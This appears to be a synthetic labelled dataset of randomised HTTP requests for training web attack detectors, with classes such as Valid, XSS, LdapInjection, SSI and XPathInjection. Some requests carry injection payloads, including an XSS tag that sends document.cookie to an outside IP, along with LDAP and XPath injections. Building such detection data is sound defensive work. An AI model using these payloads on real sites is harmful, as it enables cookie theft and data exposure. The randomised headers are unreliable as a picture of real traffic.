Accept-Language: cLrobtdo-e9JLoQc;q=0.5, g-shbavt, eomL-adrea;q=0.4
Cache-Control: no-store
Client-ip: 133.68.63.195
Cookie: 22Eca=zd@hr-rs eion dtmu 5;t9a3oen7=jo'a<xiu;ciEk3hrbtttYe=gEbe-Tat7Z4;ehj=94713;sye=44
Cookie2: $Version="0"
Date: Thu, 24 Feb 05 13:18:44 CET
ETag: "0_zQzCu3BckhMp7"
Expect: sixoriu=oErhbir
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Wed, 24 Dec 08 17:21:42 CET
If-Unmodified-Since: Mon, 25 Apr 05 20:18:50 CET
If-Match: "Ckp-xRbQB6yjalLJu"
If-None-Match: "YMVNRz-IkE2VD8Ulm8M"
If-Range: "izuo9z.ibZKs01Lm0lki"
Max-Forwards: 4996
MIME-Version: 1.6
Pragma: s9dedigt='twboeri'
Proxy-Authorization: Basic bGNoYW46bzRPYUM=
Authorization: NTLM c2VvZ29uNW9ldGliaG9kb2VpY2VnaG5zdGFlb2lydGVhZnVhdGJzZQ==
Range: 616571-065,-685
Referer: http://ioxLpa.fr/slataNo.mpg
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: aneIaeOteea1n04h64de
UA-CPU: Sparc
UA-Disp: 6865,6211,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 850x114
Via: FTP/5.8 64.82.164.188:6857, FTP/4.8 61.242.83.180, HTTP/9.7 www.elm4rebm.jpeg
Transfer-Encoding: compress
Upgrade: dtt6ee/8.3, tfTa/8.6, e3o/6.1, snle/8.8
Warning: 269 231.144.80.186 "elttysEeuzatai" "Tue, 31 May 05 09:14:48 GMT"
X-Forwarded-For: 53.181.94.126
X-Serial-Number: 29292278992836758450
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 22194
Start - Id: 21892
class: Valid
GET /eDVp_II/dDzRQLP2yrO/duK_dW/uvWZ/exBeU/0Obfzqq2NzX-/sJz8RHO/ttieieun/oq-winntxi@PPIqiC/e3Quvrx/rrrnariedrobmit/p.9RBEo.6HPZ0lAR9ePx.png?3-BMGYKl=ldeoomiAict&3r73dehu=u&nfoa=eeUPtrEe+iznrdels0&ndgcs0v6=8h6nec&nhm0=srall&sflrhy=narpmdeletetg4yofnsd&Lpeos=tmnaaisu5o&5eic=ea&zaeIluolr=nnp&uaIe=cb6cctsyt&nooiJ8rin=230591&flhl=1045519583 HTTP/1.1
Host: 155.164.163.194
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=02
Client-ip: 43.249.147.131
Cookie: Lyentt4teitf=2525;krlAit4IwRn=eperl'nve;Oirr=bhnty;enccc7aei=6
Cookie2: $Version="22"
Date: Sun, 06 Jan 08 09:47:01 GMT
ETag: "IIr71fOmkBg3nFZHdc"
Expect: dddshiix
From: gspde@ia3eGzume.be
If-Modified-Since: Mon, 06 Nov 06 13:33:44 CET
If-Unmodified-Since: Thu, 13 Mar 08 06:15:57 GMT
If-Match: "VkkRRf2GiBeiPEPsdqoI"
If-None-Match: "dlq_YtI8S6emSRD_brCx"
If-Range: *
Max-Forwards: 973
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: df2eS3 ttam=ecout
Authorization: NTLM Y2J0MDRycXJkaGphZWZpZWhoeXM4eXRUQWtlZWNuY3Fh
Range: -34244,001-
Referer: http://www.onjeE5.org/ilnn.bin
TE: trailers,chunked,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.5 (X11; U; Linux i386 2.7; 1e-ai; rv:3.6.3) Gecko/98168019
UA-CPU: StrongARM
UA-Disp: 9551,981,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x803
Via: 4lie/6.2 www.9eeaee0.htm, 3.2 15.204.187.157, FTP/7.6 103.49.148.132:3031
Transfer-Encoding: gzip
Upgrade: 7c8/8.3, xeima/1.3
Warning: 119 www.ihb8.jpg:9 "o3inrtnebtm2rTp" "Wed, 29 Oct 08 15:39:42 CET"
X-Forwarded-For: 182.115.130.238
X-Serial-Number: 3182273
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21892
Start - Id: 9230
class: Valid
GET /BY1d.1eVL/p.ckiNRD7/q-IaVaSyolf.css?rjwe6t9ntwdtn=458691&hJJ_ET=937988 HTTP/1.0
Host: 140.61.238.254:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 112.74.37.174
Cookie: slvui5tzmnhmhte=llE0PeVGO;es=divdvarrdaiha h~ c;inputexecbpHcatmKt=188349;Nshentkai=Apt+smDonb~em7h;S.j9KF7gUreplace=alDhmrAit;2tptni9eeocxhbc=mlcyse7pienueeew
Cookie2: $Version="39"
Date: Wed, 27 Jul 05 24:21:52 CET
ETag: "NlMVxF2XJtWkxdDH.Ocq"
Expect: betAnlx
From: eonssw@rmobt.cz
If-Modified-Since: Thu, 25 Feb 10 16:46:25 CET
If-Unmodified-Since: Fri, 01 Apr 05 11:14:47 UTC
If-Match: "j2JYbS9UW5CSbMAr2r"
If-None-Match: "wMUy_R3BzGMB55TRguF"
If-Range: Wed, 23 Sep 09 17:24:45 GMT
Max-Forwards: 623
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM c0FDNWZuY3MzaHFud2xzb3BobGZsb2VjdXV5c2FzczNpczdpZWRiZQ==
Authorization: NTLM dGFueTdsYWc4ZHJ0dEV0YUVycGd0dGdybGVhbWVtaW80aWVneWk=
Range: 7-,506-547400,2408-38770
Referer: /ba3ishto/ohgi5iEl/iXSwsaur/Nhwl/9wtnno.pl
TE: chunked;q=0.0,gzip
Trailer: Accept-Encoding
User-Agent: ieMOeeae
UA-CPU: Sparc
UA-Disp: 920,831,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 207x2903
Via: 8no/4.4 59.47.58.239, 6.7 112.247.8.66, 5.0 www.fseb.css:706
Transfer-Encoding: deflate
Upgrade: dje8H/7.3, tQi/4.9
Warning: 386 22.153.125.167 "t5eh" "Thu, 23 Jun 05 10:04:46 GMT"
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 83451998
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 9230
Start - Id: 26773
class: Valid
GET /aOoaQ2r79RLuEgS9Zh6o/ilJoAyZ.gBsE5cJo/ah0enhemriaa/04knetcat4.htm? HTTP/1.0
Host: www.unlEl5ro.it
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=6
Client-ip: 120.60.149.77
Cookie: Aanhtaoeja=lEahteAaEke;aoe=9;e2=n5da;6aAhnaoi=has;UDW0l.=cS/ajfrdbetweenpsn\nhandD;bEmoAtsmri=rncopy
Cookie2: $Version="868"
Date: Sat, 17 Dec 05 12:29:42 GMT
ETag: "ecRAGY-3geTFtmku3"
Expect: 100-continue
From: oGEsoi@p2axestm.gov
If-Modified-Since: Sun, 17 Dec 06 23:13:32 CET
If-Unmodified-Since: Sun, 01 Apr 07 21:59:55 GMT
If-Match: "J2w8kFRyMkXghz8SY"
If-None-Match: "A@.P7kwTDNoQQRMBKp"
If-Range: Thu, 27 May 04 18:49:32 GMT
Max-Forwards: 3
MIME-Version: 9.2
Pragma: aeu='utn9eake'
Proxy-Authorization: NEli rmsir=wllq2
Authorization: Basic YTZ2QW5sOlN0SGd5Tjlv
Range: 76-3,2076-,-744104
Referer: /ou3he.php3
TE: trailers
Trailer: From
User-Agent: ododntdmtnrnd9st
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 358x270
Via: 5.8 108.153.117.13, HTTP/1.8 www.te5omOel.css:079, 1.8 www.be8aon.tiff
Transfer-Encoding: ri7r; fxr6=uau8
Upgrade: rrraa/9.2, boeih/0.1, thxga/5.3, daihfa/0.5
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 132.196.150.167
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26773
Start - Id: 6179
class: Valid
PUT /nsHetcseoLdieoks9go/a3/eDd@hbzh-KuAOIBI6Y/cOvrtrnvsfmznev/odne/i@sJW/tDsR9_OQscpJZsOVmUh/hJTE76/pobSCJ_i/y@YWbiTN7lGxR1ti6vr/ieRas/yOservicess.msf? HTTP/1.1
Content-Length: 213
Content-Language: oaisntov,tDzh,iim
Content-Encoding: identity
Content-Location: http://www.c1hairrl.be/nE2toI/epE7.ace
Content-MD5: YThyYW1wMG45dWVzdXRvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 May 09 20:00:38 UTC
Last-Modified: Wed, 31 May 06 15:15:29 GMT
Host: www.vr1bo.fr
Connection: keep-alive
Accept: audio/*;q=0.0, image/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 118.127.32.11
Cookie: winnttmpgAICE_JooP=cm
Cookie2: $Version="6"
Date: Sat, 30 Dec 06 15:24:49 GMT
ETag: W/"Sm82AKKnEhIuXtfkcDFI"
Expect: 100-continue
From: o0dttao@1wlroaav.net
If-Modified-Since: Sat, 26 Sep 09 06:33:48 CET
If-Unmodified-Since: Fri, 18 Aug 06 24:12:57 UTC
If-Match: *
If-None-Match: "IWBmrr4v8On1wsMQL"
If-Range: Fri, 09 Sep 05 15:39:00 CET
Max-Forwards: 26
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic Y3NUYXNvdDpucXN0c2E=
Range: -167,262-,74189-
Referer: /udS6ri/lssdw1al/dtuhoE.nsf
TE: chunked
Trailer: Via
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 4.3; oa-al; rv:6.1.8) Gecko/22364998
UA-CPU: StrongARM
UA-Disp: 2552,3892,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3345x4822
Via: tuecv/7.2 0.106.253.161
Transfer-Encoding: deflate
Upgrade: rdo/9.5, reg/2.6, padioo/6.0, dtneie/9.6
Warning: 908 www.viSo.tiff "l9hhtrh9afsse" 
X-Forwarded-For: 147.71.226.116
X-Serial-Number: 113642708
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

v3gaa=dej@&eTyQh=li&D0Ngx_kwRLT=s7jep&ae070rjfRd=4034088&a2IA@JH0hm.=90&r5iDaEoceeoezfU=2664&4i0knueEEwu0r5t=66759&altvtlenharee8t=lScrd&ieoacbve7hex=isOgn&o9aernXcji=26&nAcoA=63688308&aojEna0tayTl9e=albrhnle9a7

End - Id: 6179
Start - Id: 19924
class: Valid
GET /ea7/itrfyrcsnhqnied/dcqasDElatws/eqas/LfEmK.js? HTTP/1.1
Host: 236.56.6.247
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-2022-kr
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=05396
Client-ip: 17.47.212.177
Cookie: htm=dbg6s;ear=1;FunodeRncB=rwy3ciioosPHbn;kGWj2i=0accepto:s;hj6us=whafsnuntlrs;uddi=nlx4al
Cookie2: $Version="3"
Date: Wed, 04 Jun 08 15:02:00 CET
ETag: W/"RCjO2WcwhLGdpA9"
Expect: 0n0aoi=tottio
From: hneNgnvt@ijh5.org
If-Modified-Since: Sat, 19 Jan 08 01:52:44 GMT
If-Unmodified-Since: Fri, 02 Feb 07 21:44:21 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Jun 05 20:57:02 UTC
Max-Forwards: 3
MIME-Version: 9.9
Pragma: rzgnps='Dtteeene'
Proxy-Authorization: Digest opaque="4aff8oo"
Authorization: NTLM cm91bGF0b2d0d2g5aGpOdGFsaWVpc2ZJb3R0ZjZsbjNhbXlo
Range: -938127,36370-,-5
Referer: /lmdmetd/6otu/eeSuf/uvsyt/ieugo9.php3
TE: trailers,deflate,deflate
Trailer: Via
User-Agent: i2emJcyl (tkvlxc)
UA-CPU: x86
UA-Disp: 611,1277,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 205x6501
Via: tfode0/3.4 153.36.41.210, 1.0 130.150.130.58
Transfer-Encoding: yc1ln; aciiog=rkfurs
Upgrade: edt/2.6, Oofaeg/8.4, xttqn/2.8, loa/0.5
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 52555
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19924
Start - Id: 37910
class: LdapInjection
GET /3FkSMOEKv.html?oanrioi1jrx=rxa7t+ant%26&eesSGaz=9018%29%28%26%28objectClass%3D3eO%29%28%7C%28sn++%3D+yee%29%28cn%3DAooa+++++J*%29%29 HTTP/1.0
Host: www.EKeleahlo.it
Connection: close
Accept: audio/*, audio/basic;q=0.2, text/*
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.9, compress;q=0.8, gzip, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="4"
Date: Fri, 16 Sep 05 19:28:29 GMT
ETag: "wOq5RcWCDamiFvJi"
Expect: 100-continue
From: ricsu5la@emarau.st
If-Modified-Since: Mon, 20 Aug 07 03:16:40 UTC
If-Unmodified-Since: Thu, 25 Oct 07 16:53:49 CET
If-Match: *
If-None-Match: "A08GaTbf-kkyIxM5"
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 579
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: fnitn eCTeeuhe=Ltdusgh
Authorization: Basic bnRhZnM6ZWVzM3doZQ==
Range: -004662,03-,-2001
Referer: /s4tdTt/douBitw/ya9ele3/le4nnsAy.mpeg
TE: trailers,trailers
Trailer: Host
User-Agent: k9rKYS_fY http://www.hkBr.net
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: 4.7 www.otneeng.tiff, 7.1 www.ohtji.jpg
Transfer-Encoding: identity
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 03021
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37910
Start - Id: 4881
class: Valid
POST /6sjIVqkZB8Vb9IH@o/tXD@vj56OOwS/lan9rh61s45We8bgh/NY.jsp? HTTP/1.1
Content-Length: 184
Content-Language: eipuyhl,r7setr
Content-Encoding: gzip
Content-Location: http://www.zth3ol.biz/slare.pl
Content-MD5: ZmU1bjVlZHlpaXRpdHd5Zg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 03 Oct 07 21:13:25 CET
Last-Modified: Thu, 13 Apr 06 15:08:54 CET
Host: 162.98.41.177
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-1250;q=0.7, euc-kr;q=0.7, x-mac-arabic;q=0.3, isiri-3342;q=0.9
Accept-Encoding: *
Accept-Language: s-s
Cache-Control: max-stale
Client-ip: 184.17.21.85
Cookie: okehht8enrao=sno;uaG9aetoda=1Y$wiptc&e eosgeh9;e0etze=nAuneo
Cookie2: $Version="970"
Date: Tue, 08 Jul 08 23:50:29 CET
ETag: "dcMVOniXcAScfLf"
Expect: highc=c1eo;nodt1=DeEe
From: itds3@bta1toaaio.be
If-Modified-Since: Tue, 31 Aug 04 17:19:15 UTC
If-Unmodified-Since: Sat, 21 Jul 07 10:58:06 GMT
If-Match: *
If-None-Match: "duanFDnrkLEAAi502"
If-Range: "aOyNGezDFvkoOjf"
Max-Forwards: 79
MIME-Version: 4.1
Pragma: nmif=Awr9coua
Proxy-Authorization: Digest qop=auth
Authorization: Sezl0l asne=aazcds
Range: -73,-2400
Referer: /lhuf/riirrea/mGrtc/qfit.gif
TE: trailers
Trailer: Range
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 7.0; nc-dn; rv:4.0.2) Gecko/92240793
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 696x205
Via: hoDeq1/3.1 www.zeeHI.css, FTP/0.4 170.234.168.148
Transfer-Encoding: gzip
Upgrade: wsry/3.9, n3Lf/9.4, otoco/2.2
Warning: 057 www.e7xShmti.shtml "doelar6lifleayg" "Sat, 14 Jan 06 16:16:51 GMT"
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hnspil=@9e8v&teto033=nTd2io4vintmenep0&1dii=ibcwneJDt-u&mr=373531&ejomnndo=6341&a1cnea5rm=hgRLku&rHeg3nieweiaoE=ijWOk2Jx&w4mswdO4ahge=hgtG&ilfnacevg=31&rfdsa=5773&SCK21DDF=5756783227

End - Id: 4881
Start - Id: 11263
class: Valid
GET /imos/b0Hunionh7O6/ewMcZYqMdbZxwrTHuNlW/EhelabiSfrdwseoaom/miaeutLtwelnelDtnpdj/p-O794p.@TH4VP/5cmdymetaunionH/oEbuhtS/Hs17_htuXCVp/bc/ctetto/re9a.jsp?slei813=inputtS&GhtpassU6lOgimyof=E%5Cygroup+by&xjCnrGfc.ahj=19&hsin=%2Bn%2Bene%5CQenfy5&QReAAs=iyNmochamlse6xshs%3D&ecodl8u0=ner9o&aewqhceenizY=mgdropaqaa%28nftps5uidelete HTTP/1.0
Host: www.Nou86.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 236.236.105.180
Cookie: 1Y=Joadsnla;mtNnnetoil7tsk=etheo;adeneeeSotarn=849
Cookie2: $Version="475"
Date: Sun, 14 Feb 10 18:14:20 CET
ETag: "r6cFlT69xgKl84H"
Expect: e7exuse9
From: aarli@mLmeltu.be
If-Modified-Since: Thu, 25 Mar 04 20:04:13 GMT
If-Unmodified-Since: Wed, 02 Jan 08 14:03:31 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 19 Dec 07 05:16:56 CET
Max-Forwards: 0
MIME-Version: 3.7
Pragma: be='oCmwue'
Proxy-Authorization: Basic dE5wcGVlOm9pc3M1Yw==
Authorization: NTLM cmFzSHNlWWFBSHJraGw5b2VzcnpUcG9uSXJ5b09jZXB3
Range: 394051-208299
Referer: http://www.ncrmi8.st/qGeteoei/oteTeS4r/oieoe6T.mp3
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/6.5 (X11; U; Linux i386 5.8; ts-in; rv:5.2.3) Gecko/74963920
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 234x2210
Via: 9.4 49.74.182.112
Transfer-Encoding: compress
Upgrade: ezh/4.9, hQouO/8.3, Ttomi/2.4, iind/9.4, umvntb/3.3
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11263
Start - Id: 32545
class: Valid
GET /bjltSab3Lllnl75-@/rtc6F/gQAupcQ5Tnlib0Y@_Hw/tMovwTO-SHZgklF/c9/MOwindow.openhtpassqS-Eb/hhCVrZ7./t1XBqpsru.sh?jmrnr7liment=%2Bhrlcoruds%3Cratmpl&9xwrdsHiteac=nEoUXb&on=tok&etc=62944&thgohgh=183&hprtapsrmud5=anE&otrT5zP=df%5Drieaubo&DuAand=s&e9ntieofeEr=18429543&8tteida=%3A4Verqi&dhr4dw=gTh&b7ose=8478 HTTP/1.1
Host: www.ebicu.biz
Connection: h4mdpw
Accept: video/mpeg;q=0.6, application/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 94.143.137.146
Cookie2: $Version="85"
Date: Sun, 15 Mar 09 03:14:35 GMT
Expect: 100-continue
If-Modified-Since: Thu, 09 Nov 06 18:25:21 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Sep 09 09:02:49 GMT
Proxy-Authorization: Basic aHJPTGl3OnI5cGh0aQ==
Range: -68011
Referer: http://www.axrgeee1.cz/achai/ideE/ce6nahvt/oarOmre.asmx
Trailer: If-Range
User-Agent: Mozilla/4.5 (compatible; MSIE 3.0; Mac OS X; eib6te; mtlfolt88)
Via: 2.3 www.ep8mu.js:6932, lwwi/9.9 www.rit3.shtml, 5.8 www.nshm24s.htm
Transfer-Encoding: deflate
X-Serial-Number: 6346547194291143

null

End - Id: 32545
Start - Id: 47519
class: XSS
GET /pN0t/b5O2/wmM9rCFS7Ud0NgH/gr3/hntehOtAth9wd/bEratsgSH2oNtE.shtml?mtw7iprTih=djf&srfiueopoAEZd=tdisMobject7cmdh-3saEh&naHa2=7765&.9.u.=%3Cimg++++src++++%3D+%22++++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F212.102.14.69%2Ftomaar.swf%27%2Bdocument.cookie%29%3B%5D++++++%22+++%3E&aiesmJtebraa1r=2420505 HTTP/1.1
Host: www.mI4sg1ynh.de:80
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=61400
Client-ip: 2.40.61.206
Cookie: pisoeh=655;4ezrotin5N=fc
Cookie2: $Version="7"
Date: Wed, 19 Sep 07 14:00:04 UTC
ETag: W/"s1G3EZJ-VlE1KaRun"
Expect: 100-continue
From: eudn2a@se5tse.com
If-Modified-Since: Thu, 23 Feb 06 15:12:57 GMT
If-Unmodified-Since: Sat, 24 Jul 04 10:25:37 CET
If-Match: "GtXlpG9O2ov-7RCxd"
If-None-Match: *
If-Range: Fri, 22 Aug 08 11:44:28 CET
Max-Forwards: 4
MIME-Version: 9.4
Pragma: es=ssini
Proxy-Authorization: solli r3h4i=aotni1
Authorization: Digest uri=/ut1lg1D.jsp
Range: 22-,852303-,3-
Referer: /nn6ee/n8reirk/qami/nbtTra.mspx
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: dereh (izq@PwlvE; tpicgm; rgWIlD; iF@fV-zbt; 8x52ONvnft)
UA-CPU: PowerPC
UA-Disp: 017,391,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7841x155
Via: 2.7 www.baLuabts.png, 0.3 146.187.249.113, 1.3 81.108.245.245
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 065 134.123.203.94 "ntssttrkginowelli" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47519
Start - Id: 39385
class: SSI
GET /fUPHz@VkWRvqQNK/8JwLMYrib/jOTnCAjH.7@/oousoh/W2WGLusrua5lGPRXT/neloeaikog9etl/yhu/pInlAhUavxkcSSZ04-N-/uOefs0te/gtie/h1sDsc7DF9Ej50K42F9/0ohtptadEb.htm?xcpetpmdsaN=329&n5hgel=wgetdgcnpyeeS&itrrSd2s=hEra&5E1uN46=763373&y4dg=dL19so&orn5iiom=77886&is=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&4nCldrhtOtwlr=I&Mas=77&xattnlivudy=32&Neeo=49&gnhskqeO=5wZ&lgn=6818&ai=ree1+e3e%26Nf2&3pfsc=7 HTTP/1.1
Host: www.tcFue.uk
Connection: close
Accept: image/*
Accept-Charset: *;q=0.7
Accept-Encoding: identity, gzip;q=0.9, gzip
Accept-Language: tniZssrn-gedicbig, nuadtE7T-lneoa5a;q=0.3, opleqsee-l9lm, rTuE-ed8W;q=0.7
Cache-Control: no-store
Client-ip: 242.172.212.87
Cookie: ThoydzEne59R=0774;alauccrrboaes=dUc;hi=+HRl;siLwprEsrhno5f=449;PrUF=ioc1
Cookie2: $Version="734"
Date: Mon, 26 Jul 04 10:00:12 GMT
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: bnehhbgf
From: lece@srdgy.org
If-Modified-Since: Wed, 27 Sep 06 10:07:28 UTC
If-Unmodified-Since: Fri, 15 Apr 05 19:40:18 CET
If-Match: "6Gg3TI2vMQVUdjKfnLr"
If-None-Match: "Ywl2nk3GWx5g8osfI_U"
If-Range: Fri, 23 Apr 10 14:35:24 GMT
Max-Forwards: 7158
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: OwNJ ihni=nlyne9
Authorization: NTLM bGVhcmlubmhjb0FGclNkc3VlZXRlZG10Y05zM3Rsd2VOdDVybQ==
Range: -7403,569103-
Referer: /jthe/n8OwqrN.php4
TE: gzip,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.6 (compatible; 5seyeh; SunOS sun4u; ikhtoupene; uceicnorfe)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: FTP/7.1 www.fhhsuaa.jpg:4, FTP/8.2 185.148.210.24
Transfer-Encoding: compress
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 436 www.siscd.jpeg "oiebdEomsriX" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39385
Start - Id: 49230
class: XPathInjection
GET /rig@xajP2k3zaBZ/rEdyRi.mspx?r3d5mEiNloeTVy=mleo%27++or++1%3C+++++dmn%2Footm%2Fsc%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D65%5D++++or++%276i2n6lH%27%3D+++%27&aRtb7=767&enkrue=dn&agqtatyl=6&55SDV=aweanvoceul&mt=20&nxL5=ttbtncmoascomo5&Hnru=0576732524&hhdtti4v=2&cgmrueft1ua=y HTTP/1.0
Host: 145.31.20.142
Connection: close
Accept: audio/*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: P9r-el8;q=0.3, wsse1-ateip, R-ral;q=0.3, he4ieso-dtle
Cache-Control: only-if-cached
Client-ip: 63.155.44.179
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Wed, 07 Feb 07 16:31:43 CET
ETag: "vpaJWhlnEKS-Lv1_1z"
Expect: onhtn
From: hi2H@ura3sfneT.ch
If-Modified-Since: Fri, 26 Sep 08 07:49:30 UTC
If-Unmodified-Since: Wed, 05 May 04 02:34:57 CET
If-Match: "IiwbT6McNTNS2gLTg"
If-None-Match: "0UUNAksE_nQ6y9_"
If-Range: *
Max-Forwards: 2159
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM cmhlaWR0dHRpcDBjZWV5YXpMZ2Zpd3lXaGVkbW5zZmVvU29hcXNOOXR0ZDA=
Authorization: NTLM dHBwSWVvdGFpZWphZTFjbG5lZG1za2tvOXp5b2dodWdkZXRldHNnaXV2ZWllbA==
Range: -628
Referer: http://ihha.ch/ehsnhep8/abfdaWoh/AVa6m.jpeg
TE: gzip;q=0.7,chunked;q=0.2
Trailer: Date
User-Agent: Mozilla/1.2 (X11; U; Open BSD i586 4.2; Ee-wp; rv:3.3.4) Gecko/45898064
UA-CPU: Sparc
UA-Disp: 2948,912,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 353x220
Via: 6.1 195.149.154.208
Transfer-Encoding: gzip
Upgrade: rano1/8.6
Warning: 378 www.ecns.png "easteTT0eewfrbeti3jm" 
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 2668554721639
----: ---------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49230
Start - Id: 12128
class: Valid
GET /sPi2rI/mJufyI03v1wG.P/mcYdvIOPmu/rnt8olteofi5Eu/sRT1rS.f/n5lnegt4.dll? HTTP/1.0
Host: www.titeca.it
Connection: keep-alive
Accept: video/quicktime, audio/*, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 100.77.148.18
Cookie: XpGsxQandK=vPipOnenfleumc
Cookie2: $Version="1"
Date: Tue, 21 Feb 06 15:39:32 CET
ETag: W/"ho5Sih9G.uvcpPYV"
Expect: xtnxv5a
From: 1ExrdMro@HeaOe0tSda.it
If-Modified-Since: Sun, 28 Aug 05 23:53:40 CET
If-Unmodified-Since: Thu, 14 Feb 08 22:29:13 UTC
If-Match: *
If-None-Match: "l7CDEoi1HD3jm@k9C"
If-Range: *
Max-Forwards: 220
MIME-Version: 9.6
Pragma: i6e5=r
Proxy-Authorization: Digest nonce
Authorization: sutc tnjka5ea=oetfo
Range: 2-
Referer: http://ntentsS.fr/Isinltd6/v3Oc/oleli.avi
TE: trailers,gzip;q=0.2,trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.7 (Machintosh; U; PPC 5.8; ae-df; rv:2.0.0) Gecko/22662586
UA-CPU: MIPS
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 556x8407
